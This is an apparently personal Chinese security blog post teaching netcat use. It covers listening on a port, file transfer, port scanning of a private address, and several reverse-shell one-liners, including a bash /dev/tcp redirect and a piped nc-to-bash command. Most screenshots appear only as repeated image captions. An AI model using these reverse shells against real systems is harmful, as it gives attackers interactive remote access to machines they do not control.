瑞士军刀

  • A+
所属分类:信息安全
摘要

瑞士军刀使用教程

连接

nc -lp 4444 监听4444端口

返回shell

瑞士军刀

瑞士军刀

瑞士军刀

文件传输

创建一个服务器端

创建一个客户端

端口扫描使用

nc -v -n -w1 -z 192.168.1.122 1-1000
-v 表示对错误进行详细输出
-n 不对目标机器进行dns
-z
-w1 超时设置为1s

瑞士军刀

反弹shell

1.目标服务器没有安装netcat

bash -i > & /dev/tcp/ip/port 0>&1

在命令中bash -i 表示已交互模式运行bash shell。重定向符 >& ,如果在其后加文件描述符,是将bash -i 交互式

传递给文件描述符,而如果其后是文件,则将bash -i 交互模式传递给文件。/dev/tcp/ip/port表示传递给远程主机

的IP地址对应的端口。

文件描述符: 0 标准输入、1标准输出、2、错误输入输出

命令中的 0>&1 表示将标准输入重定向到标准输出,实现远程的输入可以在远程输出对应内容。

瑞士军刀

python

瑞士军刀

2.nc 不支持nc -e 下反弹shell

反弹shell :nc ip port | /bin/bash | nc ip port

pc 接受shell : nc -lvnp port 需要启动两个监听端口

接受shell

瑞士军刀

反弹shell:

瑞士军刀

瑞士军刀

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: